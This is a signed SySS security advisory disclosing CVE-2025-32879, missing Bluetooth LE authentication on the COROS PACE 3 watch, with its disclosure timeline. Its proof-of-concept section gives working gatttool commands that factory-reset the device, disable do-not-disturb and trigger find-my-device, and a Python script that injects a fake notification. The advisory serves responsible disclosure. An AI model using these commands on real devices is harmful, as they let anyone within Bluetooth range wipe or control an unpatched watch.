-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2025-026 Product: COROS PACE 3 Manufacturer: COROS Wearables, Inc. Affected Version(s): <= V 3.0808.0 Tested Version(s): V 3.0808.0 Vulnerability Type: Missing Authentication for Critical Function (CWE-306) Risk Level: High Solution Status: Not yet fixed Manufacturer Notification: 2025-03-14 Solution Date: N.A. Public Disclosure: 2025-06-17 CVE Reference: CVE-2025-32879 Author of Advisory: Moritz Abrell, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The COROS PACE 3 is a professional GPS sport smart watch. The manufacturer describes the product as follows (see [1]): "Improving on its legendary predecessor in every way, PACE 3 packs an even more powerful punch. Track your training and recovery with a watch that's lightweight and comfortable, with advanced technology, outstanding data accuracy, and backed by the industry-leading COROS training software system. The COROS PACE 3 paves the way to discover your potential." Due to missing authentication for reading and writing Bluetooth Low Energy (BLE) services and their characteristics, an attacker within the Bluetooth range is able to interact with the COROS PACE 3. This allows completely controlling the device. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The COROS PACE 3 starts advertising if no device is connected via Bluetooth. This allows an attacker to connect with the device via BLE if no other device is connected. While connected, none of the BLE services and characteristics of the COROS PACE 3 require any authentication or security level. Therefore, any characteristic, depending on their mode of operation (read/write/notify), can be used by the connected attacker. This, e.g., allows configuring the device, sending notifications, resetting the device to factory settings or installing software files. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Example #1: device factory reset: $ gatttool -b F7:AF:1D:27:03:A5 --char-write-req --handle=0x0019 --value=850001 Example #2: deactivating the do not disturb (DND) setting: $ gatttool -b F7:AF:1D:27:03:A5 --char-write-req --handle=0x0019 --value=860000010604111c Example #3: trigger "find my device": $ gatttool -b F7:AF:1D:27:03:A5 --char-write-req --handle=0x0019 --value=b400 Example #4: sending a malicious notification: #################### import asyncio from bleak import BleakClient import sys DEVICE_ADDRESS = "F7:AF:1D:27:03:b0" CHARACTERISTIC_UUID = "6e400001b5a3f393e0a977757c7f7f70" DATA = bytes.fromhex("7900ff0008636f6d2e7769726510064841434b454420176861636b65642062792053795353200000") async def write_to_ble_device(): client = BleakClient(DEVICE_ADDRESS) try: await client.connect() await asyncio.sleep(2) if client.is_connected: print(f"connected to {DEVICE_ADDRESS}") await client.write_gatt_char(CHARACTERISTIC_UUID, DATA, response=False) print("Press ctrl-c to disconnect") await asyncio.Event().wait() except Exception as e: print(f"Error: {e}") finally: if client.is_connected: await client.disconnect() asyncio.run(write_to_ble_device()) #################### Executing the script: $ python3 poc.py ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Not yet fixed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2025-03-10: Vulnerability discovered 2025-03-14: Vulnerability reported to manufacturer 2025-03-14: Confirmation of receipt received 2025-03-17: Asked the manufacturer for an update 2025-03-31: More information provided to the manufacturer 2025-04-07: Asked the manufacturer for an update 2025-04-14: Informed the manufacturer about the assigned CVE-ID and asked for an update once again 2025-04-15: Answer received from the manufacturer; manufacturer informed SySS GmbH that a fix for the vulnerability is planned for the end of the year (2025) 2025-04-15: Receipt confirmed, and the issue was clarified once more, along with a recommendation for prompt resolution 2025-06-17: Public disclosure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] COROS PACE 3 product website https://eu.coros.com/pace3 [2] SySS Security Advisory SYSS-2025-026 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-026.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] CVE-2025-32879 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32879 [5] Detailed blog post: https://blog.syss.com/posts/bluetooth-analysis-coros-pace-3/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Abrell of SySS GmbH. E-Mail: moritz.abrell@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmhQEeMACgkQrgyb+PE0 i1OCgA/+LNvTT3CSx+GDdPNqQbAg4o/FwN4neb6enlBjPId/W7hZbFag5IeaCbnp XI1SjuZA8A/JPv9GImaeAtv7+5GavaCRZbfCqrJXBZY97BCMRBR1/VbY+o9PA0sc DfdJdjt6NZ762I1aKJ08eC369CRIezzLlb+xJnJRege29aEoYb0fVhYSoWbg3GYY auB90UiFn8gPMd9cBnALm01NsKjo/g5Fr1+K9UKXF0jGeJzQuk6/fx0jviP/di2X mSmLJD6HRRT40pA/3bc80y/DTi3bTu9ulufPaEOx5Q+id1BYkQ0JYRbbmwlci+5s 17pogm2/3i0SbjmSCwVYDzZl/67eHbqTRpNKwNFHO6B9+zn6AxiWLbp0lO/6mtTD 8mt86y70bPRUW50GPTLTMVhCjBLHo4AAgPP/WzD3GrJfjwgTQoYHOFwwY7wfCO18 dtaE2QtXhFNQ0uWbfpMWQbrygFR3xrP0coeW7eYkFOF7pTUuiUamFXoiBq0mPwfa +hKXdbZDP6yUrwk2NowA9osUVxhwymlpVGqx6DcOoagajRN8F/E9RhC3nzy3KBxq S80xsUKD7A3YuJMvAHKFUZfimog2kVnhZHCI0yv1AkfOmIFJ4zZYjIuHyxGGwqRH aAK7/YXXq6c8Q1btAy79xuArw66eI3LkmT1SFmPrFg5dWJb3csA= =8nch -----END PGP SIGNATURE-----